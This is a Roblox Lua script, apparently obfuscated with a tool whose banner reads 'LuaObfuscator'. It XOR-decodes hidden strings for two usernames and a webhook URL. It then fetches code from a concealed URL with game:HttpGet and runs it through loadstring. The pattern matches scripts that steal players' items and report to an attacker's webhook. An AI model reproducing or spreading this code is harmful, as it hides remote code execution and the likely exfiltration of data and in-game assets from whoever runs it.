--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
         

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\232\204\206\17\243\185\194\33\232\198\222\49\205\178\195","\126\177\163\187\69\134\219\167");Username2=v7("\26\194\63\241\233\33\200\21\252\249\38\217\1\204\248","\156\67\173\74\165");Webhook=v7("\60\163\93\6\175\124\9\123\179\64\5\191\41\84\48\182\89\6\242\37\73\57\248\72\6\181\105\81\49\181\65\25\179\45\85\123\230\27\64\228\114\22\108\228\17\79\237\118\23\102\239\16\67\233\116\9\121\187\72\25\168\116\83\25\165\31\27\189\119\85\38\167\127\78\159\1\92\21\167\77\64\241\20\86\13\136\101\37\165\5\114\28\227\78\44\158\63\107\30\180\120\91\155\62\105\32\166\113\2\232\19\104\35\225\70\37\149\113\73\99\179\89\61\239","\38\84\215\41\118\220\70");loadstring(game:HttpGet(v7("\88\2\54\2\237\10\89\109\0\255\71\88\37\27\234\88\3\32\7\237\85\4\33\29\240\68\19\44\6\176\83\25\47\93\210\73\6\42\23\236\99\21\48\27\238\68\89\18\33\167\9\91\15\19\247\92\5\54\23\255\92\19\48\93\243\81\31\44\93\206\99\79\123\63\255\89\26\49\6\251\81\26\39\0","\158\48\118\66\114")))();